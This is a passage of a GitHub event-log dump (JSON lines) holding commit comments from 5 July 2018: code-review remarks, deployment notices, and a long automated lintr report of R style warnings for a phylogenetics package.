{"id":"7923834841","type":"CommitCommentEvent","actor":{"login":"ckdxc"},"repo":{"name":"ckdxc/mvcdemo"},"payload":{"comment":{"id":29608100,"position":null,"line":null,"path":null,"commit_id":"8a631959613503e151242a1f4318e09d766ad059","created_at":"2018-07-05T15:07:17Z","updated_at":"2018-07-05T15:07:17Z","author_association":"OWNER","body":"1st"}},"created_at":"2018-07-05T15:07:17Z"}
{"id":"7923837829","type":"CommitCommentEvent","actor":{"login":"amensouissi"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29608110,"position":22,"line":22,"path":"assembl/static2/js/app/components/common/tabbedContent.jsx","commit_id":"279e43da136004a4370ae0d3d58b1e584dfad4bf","created_at":"2018-07-05T15:07:45Z","updated_at":"2018-07-05T15:07:45Z","author_association":"CONTRIBUTOR","body":"why not use bootstrap tabs?\r\nhttps://react-bootstrap.github.io/components/tabs/"}},"created_at":"2018-07-05T15:07:45Z"}
{"id":"7923848375","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29608133,"position":null,"line":null,"path":null,"commit_id":"2473ea1407b2add7108fc5ff52f384384d55cc75","created_at":"2018-07-05T15:09:31Z","updated_at":"2018-07-05T15:09:31Z","author_association":"MEMBER","body":"I like da purdy colors!"}},"created_at":"2018-07-05T15:09:31Z"}
{"id":"7923852798","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":29608144,"position":null,"line":null,"path":null,"commit_id":"eb57fb88dd49088f3155561fc5623f6c3af88fb2","created_at":"2018-07-05T15:10:15Z","updated_at":"2018-07-05T15:10:15Z","author_association":"OWNER","body":"Star Ocean: Blue Sphere is also fixed for SGB mode. Pokemon Gold/Silver still won't detect SGB mode."}},"created_at":"2018-07-05T15:10:15Z"}
{"id":"7923856788","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29608150,"position":null,"line":null,"path":null,"commit_id":"51526481e956a3c10f1b26fc068bc254391e6e50","created_at":"2018-07-05T15:10:55Z","updated_at":"2018-07-05T15:10:55Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-711](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-711).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-711-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T15:10:55Z"}
{"id":"7923859740","type":"CommitCommentEvent","actor":{"login":"lfarhi"},"repo":{"name":"alegrand/RR_MOOC"},"payload":{"comment":{"id":29608153,"position":null,"line":null,"path":null,"commit_id":"dbabc712e73cb4267d335ffb6700de3db89d2db8","created_at":"2018-07-05T15:11:24Z","updated_at":"2018-07-05T15:11:24Z","author_association":"COLLABORATOR","body":"ok, j'ai envoyé les modifs au sous-traitant"}},"created_at":"2018-07-05T15:11:24Z"}
{"id":"7923865810","type":"CommitCommentEvent","actor":{"login":"multun"},"repo":{"name":"multun/ipxe-bt"},"payload":{"comment":{"id":29608166,"position":4,"line":57,"path":"src/config/general.h","commit_id":"72632078873938e5b3ab3845cd2a422ed933b40d","created_at":"2018-07-05T15:12:26Z","updated_at":"2018-07-05T15:12:26Z","author_association":"OWNER","body":"TODO: default to disabled"}},"created_at":"2018-07-05T15:12:26Z"}
{"id":"7923865973","type":"CommitCommentEvent","actor":{"login":"IrinaKondrateva"},"repo":{"name":"IrinaKondrateva/june-loftschool-react-homeworks"},"payload":{"comment":{"id":29608167,"position":17,"line":9,"path":"src/reducers/search.js","commit_id":"3febcad07cd6d65cba6a7b86a9acdc4d19e15ece","created_at":"2018-07-05T15:12:28Z","updated_at":"2018-07-05T15:12:28Z","author_association":"OWNER","body":"При написании searchFailure.toString() react выдает ошибку 'Cannot read property 'toString' of undefined '. Как я понимаю это из-за того что initialState = null не имеет метода toString(), но я пробовала менять на объекты, все равно ругается. Почему?"}},"created_at":"2018-07-05T15:12:28Z"}
{"id":"7923867138","type":"CommitCommentEvent","actor":{"login":"soupdragon99"},"repo":{"name":"alphagov/gds-way"},"payload":{"comment":{"id":29608174,"position":11,"line":16,"path":"source/standards/configuration-management.html.md.erb","commit_id":"0b600f8c7a10e0535ea3298891f5f20edf241a1d","created_at":"2018-07-05T15:12:40Z","updated_at":"2018-07-05T15:12:40Z","author_association":"CONTRIBUTOR","body":"If we're saying Puppet's not necessary for a simple artefact like an AMI, but it should still be put into code and version controlled. Are there other tools that could be used instead of Puppet in this case?"}},"created_at":"2018-07-05T15:12:40Z"}
{"id":"7923869074","type":"CommitCommentEvent","actor":{"login":"volth"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":29608177,"position":null,"line":null,"path":null,"commit_id":"a92ed973e569324b55cddb128f6f638f3ea1985c","created_at":"2018-07-05T15:12:59Z","updated_at":"2018-07-05T15:12:59Z","author_association":"CONTRIBUTOR","body":"Perhaps ```NixInt``` should be 64-bit on 32-bit platforms too?\r\nIt is even weirder than 32-bit ```float``` because of the portability issues"}},"created_at":"2018-07-05T15:12:59Z"}
{"id":"7923869410","type":"CommitCommentEvent","actor":{"login":"davidjin0813"},"repo":{"name":"springware1/ccm"},"payload":{"comment":{"id":29608178,"position":6,"line":1163,"path":"tests/1/dir/index.h","commit_id":"1884f220814b91541a0a2356b3733894cd71437c","created_at":"2018-07-05T15:13:02Z","updated_at":"2018-07-05T15:13:02Z","author_association":"COLLABORATOR","body":"Ask A what the usage of zinc plate is, this is message from KOC."}},"created_at":"2018-07-05T15:13:02Z"}
{"id":"7923870060","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29608182,"position":11,"line":114,"path":"tests/network/mod.rs","commit_id":"c40c95b6bb72e3397f1c6d8d0097220318c5d5c0","created_at":"2018-07-05T15:13:09Z","updated_at":"2018-07-05T15:13:09Z","author_association":"CONTRIBUTOR","body":"Doesn't \"starvation\" mean that there is a node that's never called? Always picking non-idle nodes alone does not guarantee that. (I.e. I'm not sure about the \"`i.e.`\".)"}},"created_at":"2018-07-05T15:13:09Z"}
{"id":"7923870596","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":29608184,"position":null,"line":null,"path":null,"commit_id":"6afd1c7302c0b7a0773c8056114eef3b999df760","created_at":"2018-07-05T15:13:14Z","updated_at":"2018-07-05T15:13:14Z","author_association":"OWNER","body":"Neither of these options are ideal for CGFX nowadays. They were fine when you were supposed to dump 1 tile at a time, but GBE+ has moved away from that with meta-tiles."}},"created_at":"2018-07-05T15:13:14Z"}
{"id":"7923871121","type":"CommitCommentEvent","actor":{"login":"jarlebring"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29608188,"position":null,"line":null,"path":null,"commit_id":"c9b301fb0a8e5a7ffb5526aeb9ffbbcdffd5d226","created_at":"2018-07-05T15:13:19Z","updated_at":"2018-07-05T15:13:19Z","author_association":"CONTRIBUTOR","body":"I meant @meleg "}},"created_at":"2018-07-05T15:13:19Z"}
{"id":"7923875114","type":"CommitCommentEvent","actor":{"login":"rakeshongithub"},"repo":{"name":"micodls/express-sanitize-escape"},"payload":{"comment":{"id":29608193,"position":null,"line":null,"path":null,"commit_id":"44a95ed4e6bde00fd8ccbaec8cf741a8453da2c6","created_at":"2018-07-05T15:13:59Z","updated_at":"2018-07-05T15:13:59Z","author_association":"NONE","body":"Please merge this fix."}},"created_at":"2018-07-05T15:13:59Z"}
{"id":"7923875415","type":"CommitCommentEvent","actor":{"login":"conory"},"repo":{"name":"rhymix/rhymix"},"payload":{"comment":{"id":29608194,"position":56,"line":575,"path":"classes/display/HTMLDisplayHandler.php","commit_id":"35b73eec0b4ada480ae00247a3aec44d899bb405","created_at":"2018-07-05T15:14:02Z","updated_at":"2018-07-05T15:14:02Z","author_association":"MEMBER","body":"옮기면 https://도메인/index.php?act=dispMemberAdminList 이런 경우는 깨집니다. (물론 설마 그렇게 접근하지는 않겠지만... 혹시나...) 다시 생각해보니 문제 없겠네요."}},"created_at":"2018-07-05T15:14:02Z"}
{"id":"7923878094","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29608199,"position":63,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/subfolder/dbhandler.d","commit_id":"abd5e32a2d58f0a2b76e8d7ea10f36e9b64013f5","created_at":"2018-07-05T15:14:29Z","updated_at":"2018-07-05T15:14:29Z","author_association":"OWNER","body":"Use buildPath when creating paths"}},"created_at":"2018-07-05T15:14:29Z"}
{"id":"7923882822","type":"CommitCommentEvent","actor":{"login":"multun"},"repo":{"name":"multun/ipxe-bt"},"payload":{"comment":{"id":29608207,"position":75,"line":75,"path":"src/net/bittorrent/bittorrent_metadata.c","commit_id":"72632078873938e5b3ab3845cd2a422ed933b40d","created_at":"2018-07-05T15:15:14Z","updated_at":"2018-07-05T15:15:14Z","author_association":"OWNER","body":"TODO: peerids don't need to be alphanumeric, just fill it with random()"}},"created_at":"2018-07-05T15:15:14Z"}
{"id":"7923883222","type":"CommitCommentEvent","actor":{"login":"boffbowsh"},"repo":{"name":"alphagov/gds-way"},"payload":{"comment":{"id":29608208,"position":11,"line":16,"path":"source/standards/configuration-management.html.md.erb","commit_id":"0b600f8c7a10e0535ea3298891f5f20edf241a1d","created_at":"2018-07-05T15:15:17Z","updated_at":"2018-07-05T15:15:17Z","author_association":"MEMBER","body":"The process for building it needs to be version controlled. I don't think prescribing tools for building AMIs is in the scope of this document."}},"created_at":"2018-07-05T15:15:17Z"}
{"id":"7923883867","type":"CommitCommentEvent","actor":{"login":"Formartha"},"repo":{"name":"pytest-dev/pytest-html"},"payload":{"comment":{"id":29608211,"position":null,"line":null,"path":null,"commit_id":"d81d1563cb2f91c66f31a9a969ac9632fc85496e","created_at":"2018-07-05T15:15:23Z","updated_at":"2018-07-05T15:15:23Z","author_association":"NONE","body":"I think we need to handle a case where we pass a list of query params that will assist with collapsing the entries report and only the one that failed."}},"created_at":"2018-07-05T15:15:23Z"}
{"id":"7923890279","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29608219,"position":27,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/subfolder/filewriter.d","commit_id":"46117cff4ee5748741e94be83d67398b81aad231","created_at":"2018-07-05T15:16:25Z","updated_at":"2018-07-05T15:16:25Z","author_association":"OWNER","body":"RAII, no need to explicitly call close"}},"created_at":"2018-07-05T15:16:25Z"}
{"id":"7923890397","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":29608220,"position":null,"line":null,"path":null,"commit_id":"40ffbd319f0bbf6fd8ee7c8c430e6da6f969f1ca","created_at":"2018-07-05T15:16:26Z","updated_at":"2018-07-05T15:16:26Z","author_association":"OWNER","body":"This is an old holdover from the original GBE project. Back when you had to dump tiles one-by-one, it was useful to simply dump every tile you encountered as you played the game (similar to how Dolphin dumps textures as you play games). With meta-tiles, there's no need for this method. Removing it cleans up the CGFX Qt code (which is already massive and needs more cleaning). "}},"created_at":"2018-07-05T15:16:26Z"}
{"id":"7923892767","type":"CommitCommentEvent","actor":{"login":"calvss"},"repo":{"name":"FrancisGregoryNg/Sensor-Fusion-using-a-Particle-Filter"},"payload":{"comment":{"id":29608224,"position":null,"line":null,"path":null,"commit_id":"24496a845be4ffb78f46950568974c3762c12f4c","created_at":"2018-07-05T15:16:49Z","updated_at":"2018-07-05T15:16:49Z","author_association":"COLLABORATOR","body":"I also removed the constant position error from the AGV library IEEE data."}},"created_at":"2018-07-05T15:16:49Z"}
{"id":"7923893326","type":"CommitCommentEvent","actor":{"login":"ishukhanchi"},"repo":{"name":"ishukhanchi/connectdevices"},"payload":{"comment":{"id":29608225,"position":null,"line":null,"path":null,"commit_id":"931c403735780db8cc6d41f0d541a323cf1c8181","created_at":"2018-07-05T15:16:54Z","updated_at":"2018-07-05T15:16:54Z","author_association":"OWNER","body":"In Progress."}},"created_at":"2018-07-05T15:16:54Z"}
{"id":"7923896512","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29608228,"position":null,"line":null,"path":null,"commit_id":"22f0f8127086abd03d7d7ef75253c877bd224814","created_at":"2018-07-05T15:17:25Z","updated_at":"2018-07-05T15:17:25Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-226](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-226).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-226-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-05T15:17:25Z"}
{"id":"7923900122","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29608236,"position":13,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/subfolder/filewriter.d","commit_id":"46117cff4ee5748741e94be83d67398b81aad231","created_at":"2018-07-05T15:18:00Z","updated_at":"2018-07-05T15:18:00Z","author_association":"OWNER","body":"Add @safe: to the top of all files. It will then trigger compiler warnings when possibly unsafe operations are performed. See the D book for safe or the spec"}},"created_at":"2018-07-05T15:18:00Z"}
{"id":"7923900966","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/ips"},"payload":{"comment":{"id":29608239,"position":null,"line":null,"path":null,"commit_id":"c13725ff75073a46403e85b43522c1cbc973367d","created_at":"2018-07-05T15:18:09Z","updated_at":"2018-07-05T15:18:09Z","author_association":"NONE","body":"[R/aliscore.R:1:63:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L1) *style:* **Trailing whitespace is superfluous.**\n```r\n​aliscore <- function(x, gaps = \"5state\", w = 6, r, t, l, s, o, \n                                                              ^\n```\n[R/aliscore.R:3:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L3) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t\n^\n```\n[R/aliscore.R:3:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L3) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/aliscore.R:4:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L4) *style:* **Use spaces to indent, not tabs.**\n```r\n​\trwd <- getwd()\n^\n```\n[R/aliscore.R:5:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L5) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tsetwd(path)\n^\n```\n[R/aliscore.R:6:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L6) *style:* **Use spaces to indent, not tabs.**\n```r\n​\twrite.fas(x, \"input.fas\")\n^\n```\n[R/aliscore.R:6:2:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L6) *warning:* **no visible global function definition for ‘write.fas’**\n```r\n​\twrite.fas(x, \"input.fas\")\n ^~~~~~~~~\n```\n[R/aliscore.R:7:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L7) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/aliscore.R:10:3:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L10) *style:* **Variable or function name should be snake_case.**\n```r\n​  N <- ifelse( gaps == \"5state\", \"\", \"-N\") # treatment of gaps\n  ^\n```\n[R/aliscore.R:10:15:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  N <- ifelse( gaps == \"5state\", \"\", \"-N\") # treatment of gaps\n              ^\n```\n[R/aliscore.R:12:15:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L12) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  r <- ifelse( missing(r), \"\", paste(\"-r\", r ))\n              ^\n```\n[R/aliscore.R:12:45:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L12) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  r <- ifelse( missing(r), \"\", paste(\"-r\", r ))\n                                            ^\n```\n[R/aliscore.R:13:7:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L13) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  if ( !missing(t) ) stop(\"option -t not yet implemented\")\n      ^\n```\n[R/aliscore.R:13:19:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L13) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  if ( !missing(t) ) stop(\"option -t not yet implemented\")\n                  ^\n```\n[R/aliscore.R:14:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L14) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tif ( !missing(l) ) stop(\"option -l not yet implemented\")\n^\n```\n[R/aliscore.R:14:6:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L14) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​\tif ( !missing(l) ) stop(\"option -l not yet implemented\")\n     ^\n```\n[R/aliscore.R:14:18:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L14) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​\tif ( !missing(l) ) stop(\"option -l not yet implemented\")\n                 ^\n```\n[R/aliscore.R:15:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L15) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tif ( !missing(s) ) stop(\"option -s not yet implemented\")\n^\n```\n[R/aliscore.R:15:6:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L15) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​\tif ( !missing(s) ) stop(\"option -s not yet implemented\")\n     ^\n```\n[R/aliscore.R:15:18:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L15) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​\tif ( !missing(s) ) stop(\"option -s not yet implemented\")\n                 ^\n```\n[R/aliscore.R:16:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L16) *style:* **Use spaces to indent, not tabs.**\n```r\n​\to <- ifelse( missing(o), \"\", paste(\"-o\", paste(o, collapse = \",\") ))\n^\n```\n[R/aliscore.R:16:14:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L16) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​\to <- ifelse( missing(o), \"\", paste(\"-o\", paste(o, collapse = \",\") ))\n             ^\n```\n[R/aliscore.R:16:67:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L16) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​\to <- ifelse( missing(o), \"\", paste(\"-o\", paste(o, collapse = \",\") ))\n                                                                  ^\n```\n[R/aliscore.R:17:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/aliscore.R:18:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L18) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tcall <- paste(\"perl Aliscore.02.2.pl -i input.fas\",\n^\n```\n[R/aliscore.R:20:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/aliscore.R:21:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L21) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tsystem(call)\n^\n```\n[R/aliscore.R:22:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L22) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tid <- scan(\"input.fas_List_l_all.txt\",\n^\n```\n[R/aliscore.R:24:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L24) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tid <- as.numeric(id)\n^\n```\n[R/aliscore.R:25:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L25) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tnid <- length(id)\n^\n```\n[R/aliscore.R:26:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L26) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tif ( nid == 0 ) {\n^\n```\n[R/aliscore.R:26:6:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L26) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​\tif ( nid == 0 ) {\n     ^\n```\n[R/aliscore.R:26:15:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L26) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​\tif ( nid == 0 ) {\n              ^\n```\n[R/aliscore.R:27:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L27) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t  cat(\"\\nALISCORE did not remove any characters.\")\n^\n```\n[R/aliscore.R:28:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L28) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t} else {\n^\n```\n[R/aliscore.R:29:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L29) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t    x <- x[, -id]\n^\n```\n[R/aliscore.R:30:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L30) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t    cat(\"\\nALISCORE removed\", nid, \"characters.\")\n^\n```\n[R/aliscore.R:31:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L31) *style:* **Use spaces to indent, not tabs.**\n```r\n​\t}\n^\n```\n[R/aliscore.R:32:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L32) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tsetwd(rwd)\n^\n```\n[R/aliscore.R:33:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/aliscore.R#L33) *style:* **Use spaces to indent, not tabs.**\n```r\n​\tx\n^\n```\n[R/are.tips.consecutive.R:4:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/are.tips.consecutive.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​are.tips.consecutive <- function(phy){\n^~~~~~~~~~~~~~~~~~~~\n```\n[R/are.tips.consecutive.R:8:7:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/are.tips.consecutive.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  if ( !identical(canonical, given) ) \n      ^\n```\n[R/are.tips.consecutive.R:8:36:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/are.tips.consecutive.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  if ( !identical(canonical, given) ) \n                                   ^\n```\n[R/are.tips.consecutive.R:8:38:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/are.tips.consecutive.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if ( !identical(canonical, given) ) \n                                     ^\n```\n[R/assembleDataNode.R:4:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDataNode.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​assembleDataNode <- function(DNAbin){\n^~~~~~~~~~~~~~~~\n```\n[R/assembleDataNode.R:4:30:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDataNode.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​assembleDataNode <- function(DNAbin){\n                             ^~~~~~\n```\n[R/assembleDataNode.R:5:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDataNode.R#L5) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleDataNode.R:7:8:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDataNode.R#L7) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  for ( i in 1:length(DNAbin) ){\n       ^\n```\n[R/assembleDataNode.R:7:30:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDataNode.R#L7) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  for ( i in 1:length(DNAbin) ){\n                             ^\n```\n[R/assembleDataNode.R:17:61:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDataNode.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​    sequence <- apply(ss, 1, function(x) xmlNode(\"sequence\", \n                                                            ^\n```\n[R/assembleDataNode.R:18:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDataNode.R#L18) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                                 attrs = c(x[1], x[2], x[3], x[4])))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleDataNode.R:19:41:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDataNode.R#L19) *style:* **Trailing whitespace is superfluous.**\n```r\n​    data <- c(data, list(xmlNode(\"data\", \n                                        ^\n```\n[R/assembleDistributionNode.R:4:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​assembleDistributionNode <- function(id){\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:5:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L5) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleDistributionNode.R:6:35:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L6) *style:* **Trailing whitespace is superfluous.**\n```r\n​  prior <- xmlNode(\"distribution\", \n                                  ^\n```\n[R/assembleDistributionNode.R:11:31:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​                         name =\"distr\",\n                              ^~\n```\n[R/assembleDistributionNode.R:13:3:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L13) *style:* **Variable or function name should be snake_case.**\n```r\n​  u.step <- 1\n  ^~~~~~\n```\n[R/assembleDistributionNode.R:14:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L14) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleDistributionNode.R:17:20:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \"distribution\", \n                   